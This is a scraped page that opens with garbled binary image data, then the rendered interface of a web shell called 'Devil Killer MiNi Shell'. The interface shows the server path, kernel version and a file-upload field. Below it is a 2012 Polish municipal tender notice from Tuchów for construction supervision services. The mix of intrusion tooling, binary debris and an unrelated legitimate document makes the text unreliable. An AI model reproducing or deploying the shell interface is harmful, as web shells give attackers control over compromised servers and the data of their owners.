JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121203/484528-N-2012.html

<p class="kh_header"><b>Tuchów: Pełnienie Nadzoru Inwestorskiego dla zadania 
pn  Utworzenie Tuchowskiej Strefy Aktywności Gospodarczej na terenach poprzemysłowych</b><br>
<b>Numer ogłoszenia: 484528 - 2012; data zamieszczenia: 03.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuchów , ul. Rynek 1, 33-170 Tuchów, woj. małopolskie, tel. 0146525218 w. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tuchow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie Nadzoru Inwestorskiego dla zadania 
pn  Utworzenie Tuchowskiej Strefy Aktywności Gospodarczej na terenach poprzemysłowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia  jest pełnienie nadzoru inwestorskiego wielobranżowego  dla realizacji inwestycji związanej z utworzeniem  Tuchowskiej Strefy Aktywności Gospodarczej na terenach poprzemysłowych 
W zakres  nadzoru wchodzi :
- pełny zakres czynności określony w przepisach ustawy z dnia 7 lipca 1994 Prawo budowlane /Dz.U.Nr 207 poz.2016 z póżn.zm / oraz uczestniczenie w fazie przygotowawczej ,fazie realizacji i fazie końcowych rozliczeń inwestycji.---  reprezentowanie Zamawiajacego na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej oraz wnioskiem o dofinansowanie,
-pełnienie nadzoru nad realizacją inwestycji  obejmującej:
1.Budowa  sieci kanalizacji sanitarnej w Gminie Tuchów na terenie planowanej SAG z włączeniem do kanalizacji sanitarnej. Do wybudowania wstępnie założono 760 metrów bieżących kanalizacji o średnicy 200 mm.
2.Budowa dróg dojazdowych do SAG wraz ze zjazdem z drogi krajowej nr 977, wewnętrznych na terenie strefy, jak również modernizacja istniejącej drogi.
3.Budowa oświetlenia dróg i głównego parkingu strefy gospodarczej. 
4.Budowa  głównego parkingu SAG na działce 41/7.
5.Budowa sieci wodociągowej wzdłuż ciągów komunikacyjnych zabezpieczającą przyszłych inwestorów od strony p. poż., jak również dającą możliwość podłączenia odbiorców. Do wybudowania wstępnie założono 780 metrów bieżących sieci wodociągowej magistralnej o średnicy 110 mm.
W ramach budowy  dróg przewidziano :
Droga wewnętrzna na terenie Bazy Las  długość do budowy 340 mb. 
Droga wewnętrzna k/Sajdaka,  szerokość budowanej drogi to 6 m przewidywana długość do budowy 170 mb. 
Droga wewnętrzna k/Betoniarni  o szerkości 10 m przewidywana długość do budowy 260 mb. 
Droga wewnętrzna o szerokość 10 m, planowana długość 130 mb. 
Droga wewnętrzna o szerokość 10 m, planowana długość 174 mb. 
Droga w strefie (droga łącząca strefę z drogą wojewódzką ). 
Droga od strefy do drogi wojewódzkiej nr 977.
Modernizacja ul. Długiej. 
Inspektor nadzoru jest zobowiązany do wykonywania obowiązków  określonych przepisami prawa  oraz :
-przygotowanie wszystkich dokumentów do przekazania placu budowy  Wykonawcy robót budowlanych,
-przygotowanie niezbędnych dokumentów do zgłoszenia  rozpoczęcia  i zakończenia robót do PINB
-sprawowanie kontroli nad zgodnością i prawidłowością realizacji robót z dokumentacją projektową i pozwoleniami na budowę, SIWZ, ofertą wykonawcy, zawartą umową , umową z instytucją współfinansującą, przepisami prawa ,obowiązujacymi Normami oraz zasadami wiedzy technicznej ,
-sprawnego zarządzania inwestycją w sposób umożliwiajacy :kontrolę i rejestrację postępu robót, kontrolę finansową ,rejestrację zmian
-kontroli robót : prowadzenia regularnych inspekcji na terenie budowy w celu sprawdzenia jakości wykonanych robót, monitorowania realizacji zawartej umowy i składanie co miesięcznych raportów zamawiającemu określajacych postęp robót,
-sprawdzanie jakości wykonanych robót i wbudowanych wyrobów budowlanych a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie,
-sprawdzanie i odbiór robót budowlanych ulegajacych zakryciu lub zanikajacych, uczestniczenie w próbach i odbiorach technicznych instalacji urządzeń technicznych  zgodnie z zakresem dokumentacji budowlanej 
-kontrola prawidłowości zafakturowania wykonanych robót, potwierdzania faktycznie wykonanych robót oraz usunięcia wad także na żądanie Zamawiajacego,  kontrolowanie rozliczeń budowy,
-sporządzanie i przekazywanie Zamawiajacemu podpisanych protokołów odbiorów częściowych robót wraz ze sprawdzonym rozliczeniem finansowym tych prac, dokumentacji rzeczowo-finansowej - powykonawczej w sposób zapewniający sprawne i terminowe płatnosci wykonawcy robót,
-egzekwowanie od wwykonawcy robót obsługi geodezyjnej i inwentaryzacji powykonawczej także w wersji elektronicznej
-w przypadku gdy wszczęty zostanie spór sądowy między Wykonawcą  a Zamawiajacym dotyczący realizacji inwestycji, wsparcie Zamawiającego poprzez przedstawienie wyczerpujących informacji i wyjaśnień dotyczących sporu  oraz jednoznacznego stanowiska wykonawcy co do przedmiotu sporu,
-prowadzenie dokumentacji fotograficznej z realizacji inwestycji  i przekazywanie jej jako załącznik do comiesięcznych raportów w wersji papierowej i elektronicznej ,
-Wykonawca jest zobowiazany do znajomości przepisów i wytycznych instytucji współfinansujacej,/MRPO/
-wydawanie kierownikowi budowy poleceń potwierdzonych wpisem do dziennika budowy, dotyczących realizacji zadania
-potwierdzania swojej bytności na budowie zapisem w dzienniku budowy i dokonywania wpisów stwierdzajacych wszystkie okolicznści majace znaczenie dla oceny właściwego wykonywania robót,
-wstrzymania robót budowlanych w przypadku gdyby ich kontynuacja mogła wywołać zagrożenia bądż spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę,
-nadzorowania budowy w takich odstępach czasu aby była zapewniona skutaczność nadzoru,
w razie konieczności wykonywania robót zamiennych spisania z kierownikiem budowy protokołu konieczności 
-sprawdzenie kompletności dokumentacji odbiorowej wraz z wszystkimi dokumentami niezbędnymi do uzyskania decyzji na  użytkowanie
-złożenie wniosku wraz z niezbędnymi dokumentami do PINB celem uzyskania decyzji na użytkowanie
-uczestniczenie w przekazaniu do użytkowania Zamawiajacemu przedmiot umowy z Wykonawcą robót,
-wsperanie Zamawiajacego we wszystkich czynnościach technicznych , administracyjnych związanych z realizacją kontraktu , uzyskaniem decyzji na użytkowanie oraz  rozliczaniem z instytucją współfinansującą 
-obsługa okresu gwarancyjnego na roboty budowlane
-nadzór nad usterkami stwierdzonymi w trakcie odbioru końcowego odbioru i w trakcie okresu gwarancyjnego oraz protokolarne ich usunięcie,
-przeprowadzenie przegladów gwarancyjnych  z udziałem Zamawiającego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają  uprawnienia  do wykonania określonej  działalności  lub  czynności jeżeli  przepisy  prawa  nakładają  obowiązek  ich  posiadania. 

Przedmiotowy warunek zostanie uznany za spełniony, jeżeli wykonawca  udokumentuje uprawnienia do występowania                  w obrocie prawnym.
Ocena  tego warunku będzie dokonana  na  podstawie:

aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert,  a  w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w  zakresie  wymaganej  wiedzy  i  doświadczenia -  Zamawiający  wymaga, aby  wykonawca  wykazał  się  wykonaniem  co  najmniej 1 usługi o tożsamym charakterze w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie). Tożsamy charakter rozumieć należy jako świadczenie usług  nadzoru nad robotami  budowlanymi ( łącznie nad drogami/parkingami, sieciami wod-kan., oświetleniem) o łącznej wartości tychże robót nie mniej niż 3 mln . Do wykazu wykonanych usług (zał. nr 3 do SIWZ) należy dołączyć dokumenty potwierdzające, że usługi zostały wykonane lub są wykonywane należycie

Ocena  tego warunku będzie dokonana  na  podstawie:
-wykazu usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia. - załącznik  nr  3  SIWZ,
Do  każdej  pozycji  wyszczególnionej  w   załączniku  nr  3   SIWZ  należy  załączyć  dokument  potwierdzający  należyte  wykonanie  zamówienia. 
Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  wymaga, aby  wykonawca  dysponował  odpowiednim  potencjałem  technicznym  do  wykonania  niniejszego  zamówienia. 

Zamawiający  nie  wyznacza  szczegółowego  warunku  w  tym  zakresie  i  nie  żąda  dokumentów  wykazujących  spełnienie  przez  wykonawcę  w/w  warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  wymaga, aby  wykonawca  dysponował:

- osobami ,które będą uczestniczyć w wykonywaniu zamówienia obejmującego usługi  w zakresie nadzorowania w każdej branży objętej zamówieniem /  inspektorem robót drogowych , inspektorem robót instalacyjnych w zakresie sieci ,instalacji i urządzeń elektrycznych ,elektroenergetycznych  inspektorem robót instalacyjnych w zakresie sieci ,instalacji i urządzeń  wodno-sanitarnych/ ,wraz z informacjami na temat ich kwalifikacji zawodowych ,doświadczenia / nie mniej niż 3 lata /i wykształcenia ,niezbędnych do wykonania zamówienia , a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami.
- oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustaw nakładają obowiązek posiadania takich uprawnień   .

Przez  minimalne  kwalifikacje  zawodowe  dla  stanowisk, dla  których  wymagane  są  uprawnienia  budowlane  rozumie  się  lata  czynne  zawodowo  od  daty  uzyskania  uprawnień, oraz  lata  przepracowane  na  odpowiednich  stanowiskach   zgodnie  z  ustawą  z  dnia  7  lipca  1994 r. Prawo  budowlane (t.j. Dz. U. z 2010   nr 243 poz. 1623),bedących członkiem Okręgowej Izby Inżynierów Budownictwa

Jeżeli wykonawca polegać będzie na zasobach innych podmiotów, należy przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych  zasobów na okres korzystania z nich przy wykonaniu zamówienia,w tymczasowe.

Ocena tego warunku będzie dokonana w oparciu o:

-oświadczenie  wykonawcy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
-wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją   o podstawie do dysponowania tymi osobami - załącznik  nr  4  SIWZ
Wykonawca  może  polegać  na  osobach  zdolnych  do  wykonania  zamówienia  innych  podmiotów, niezależnie  od  charakteru  prawnego  łączących  go  z  nimi  stosunków, udowadniając  iż  będzie  dysponował  osobami  zdolnymi                  do  wykonania  zamówienia, w  szczególności  przedstawiając  pisemne  zobowiązanie  tych  podmiotów  do  oddania  do  dyspozycji  niezbędnych  osób  na  okres  korzystania  z  nich  przy  wykonaniu  zamówienia.

W  przypadku  nie dysponowania  osobami  zdolnymi  do  wykonania  zamówienia, a nie  posiadania  potencjału  technicznego  należy  przedstawić  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego  i  osób  zdolnych  do  wykonania  zamówienia. 

Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  zakresie  wymaganej  sytuacji  ekonomicznej  i  finansowej  - Zamawiający  wymaga, aby  wykonawca  był  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  gospodarczej  na  kwotę nie mniejszą   niż    100 tyś  PLN, oraz  że  znajduje  się  w  dobrej  sytuacji  finansowej  i  ekonomicznej. 

Ocena tego warunku zostanie dokonana  na  podstawie:

- opłaconej polisy, a w przypadku  jej  braku  innego  dokumentu  potwierdzającego, że  wykonawca  jest  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  związanej  z  przedmiotem  zamówienia
- oświadczenia, że wykonawca znajduje się w dobrej kondycji finansowej i ekonomicznej, złożonego w dokumencie  o nazwie oświadczenie - załącznik nr 2  SIWZ

Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje  możliwość  wprowadzenia  zmian  do  zawartej  umowy  w  stosunku  do  treści  oferty                  w następujących  okolicznościach:
a. wystąpieniem  w  trakcie  realizacji  niniejszej  umowy  konieczności  wykonania  robót  dodatkowych, nie  objętych  zamówieniem  podstawowym, których  wykonanie  stanie  się  konieczne  na  skutek  sytuacji  niemożliwej  wcześniej  do  przewidzenia, a  wykonanie  zamówienia  podstawowego  będzie  uzależnione  od  wykonania  zamówienia  dodatkowego.
b.działaniem  zdarzeń  losowych
c.. niekorzystnymi  warunkami  atmosferycznymi  uniemożliwiającymi  przeprowadzenie  w  terminie  ustalonych robót  budowlanych a tym samym i ich nadzorowania
d. gdy  w  wyniku  rozliczenia    udzielonej  dotacji   i  wynikającym  stąd  ostatecznym  terminem rozliczenia              nie  jest  możliwe  dotrzymanie  umownego  terminu  wykonania  umowy
e.zmniejszenia  zakresu  umownego  robót  z  przyczyn  technicznych  lub  gospodarczych  niemożliwych  wcześniej do  przewidzenia  przez  Zamawiającego
f.zmniejszenia  wysokości  wynagrodzenia   przewidzianego  w  umowie, spowodowanego  koniecznością zmniejszenia  zakresu  umownego  robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tuchow.BIP Tuchow//Zamówienia  publiczne+ogłoszenia/<br>
